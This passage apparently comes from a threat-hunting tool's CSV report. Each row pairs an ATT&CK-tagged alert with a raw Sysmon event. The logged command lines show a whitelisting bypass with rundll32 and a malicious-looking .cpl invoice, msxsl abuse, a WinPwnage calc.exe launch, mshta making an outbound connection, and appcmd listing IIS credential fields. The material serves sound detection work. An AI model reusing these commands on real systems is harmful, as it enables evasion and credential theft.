<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:20.711201Z"">
</TimeCreated>
<EventRecordID>4908</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:19.687</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49827</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">93.184.220.29</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ProcessId"">4356</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
<Data Name=""ParentProcessId"">4996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T17:26:08.716859Z"">
</TimeCreated>
<EventRecordID>1017</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 17:26:08.686</Data>
<Data Name=""ProcessGuid"">365ABB72-D7B0-5CE6-0000-001077C56D00</Data>
<Data Name=""ProcessId"">3388</Data>
<Data Name=""Image"">\\vboxsrv\HTools\msxsl.exe</Data>
<Data Name=""FileVersion"">1.1.0.1</Data>
<Data Name=""Description"">msxsl</Data>
<Data Name=""Product"">Command Line XSLT</Data>
<Data Name=""Company"">Microsoft</Data>
<Data Name=""CommandLine"">msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat</Data>
<Data Name=""CurrentDirectory"">D:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D2D4-5CE6-0000-001047EA6400</Data>
<Data Name=""ParentProcessId"">2236</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-10T17:48:47.077612Z"">
</TimeCreated>
<EventRecordID>380456</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3312"" ThreadID=""3928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">-</Data>
<Data Name=""UtcTime"">2020-09-10 17:48:39.678</Data>
<Data Name=""ProcessGuid"">747F3D96-66F7-5F5A-0500-00000000F600</Data>
<Data Name=""ProcessId"">388</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-66F8-5F5A-E703-000000000000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-66F4-5F5A-0300-00000000F600</Data>
<Data Name=""ParentProcessId"">300</Data>
<Data Name=""ParentImage"">C:\Windows\System32\smss.exe</Data>
<Data Name=""ParentCommandLine"">\SystemRoot\System32\smss.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ProcessId"">4356</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
<Data Name=""ParentProcessId"">4996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;, )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:11:17.587732Z"">
</TimeCreated>
<EventRecordID>4863</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:11:17.445</Data>
<Data Name=""ProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ProcessId"">4356</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010A7B65500</Data>
<Data Name=""ParentProcessId"">4996</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:20:01.980574Z"">
</TimeCreated>
<EventRecordID>16511</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:20:01.964</Data>
<Data Name=""ProcessGuid"">365ABB72-55C1-5CD8-0000-0010970D2F00</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-502E-5CD8-0000-00102A330700</Data>
<Data Name=""ParentProcessId"">3192</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
</TimeCreated>
<EventRecordID>16390</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
<Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
<Data Name=""ProcessId"">3560</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
</TimeCreated>
<EventRecordID>16390</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
<Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
<Data Name=""ProcessId"">3560</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.893033Z"">
</TimeCreated>
<EventRecordID>5940</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.852</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00102FAAFF00</Data>
<Data Name=""ProcessId"">3304</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
